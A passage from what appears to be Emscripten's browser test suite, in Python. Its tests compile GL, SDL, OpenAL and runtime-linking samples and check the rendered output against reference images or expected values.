return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_test_file('script1.js', '''
Module._set(456);
''')
create_test_file('file1.txt', 'first')
create_test_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'EXIT_RUNTIME=1']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre3.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS=1', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_test_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_proc.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_glew.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_mt.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_fog.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao_es.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure', '1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
create_test_file('supp.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
main = r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
#ifdef BROWSER
REPORT_RESULT(suppInt);
#endif
return 0;
}
'''
self.compile_btest(['supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2', '-s', 'EXPORT_ALL'])
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE', '-O2', '-s', 'RUNTIME_LINKED_LIBS=["supp.wasm"]', '-s', 'EXPORT_ALL=1'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
